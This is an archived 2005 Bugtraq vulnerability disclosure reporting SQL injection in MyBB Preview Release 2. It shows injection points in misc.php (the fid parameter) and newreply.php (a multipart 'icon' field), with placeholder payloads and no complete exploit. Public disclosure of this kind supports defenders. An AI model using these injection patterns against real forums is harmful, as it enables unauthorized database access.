[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SQL Injection[2] In MyBB PR2

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SQL Injection[2] In MyBB PR2
From: stranger-killer@xxxxxxxxxxx
Date: 7 Sep 2005 10:32:05 -0000

Hello ..

The Injected File : misc.php , newreply.php
Discovered by: Devil-00

Injected Versions :-
MyBB Preview Release 2

misc.php :-
[CODE]
http://site/misc.php?action=rules&fid=-1' [SQL]
[/CODE]

newreply.php :-
[CODE]
Do Preview By FireFox And Edit Header ;)

Content-Disposition: form-data; name="icon"\r\n
\r\n
-1') [SQL] /*\r\n
[/CODE]

GreeTz For Security4Arab Team And HACKERS PAL And ABDUCTER

Prev by Date: Re: Microsoft Windows keybd_event validation vulnerability
Next by Date: Re: [NOBYTES.COM: #11] MidiCart ASP Shopping Cart, Evaluation Version 7 & Standard & Pro - Multiple Vulnerabilities
Previous by thread: Vulnerability In SecureOL VE2 v1.05.1008
Next by thread: [SECURITY] [DSA 802-1] New cvs packages fix insecure temporary files
Index(es):
- Date
- Thread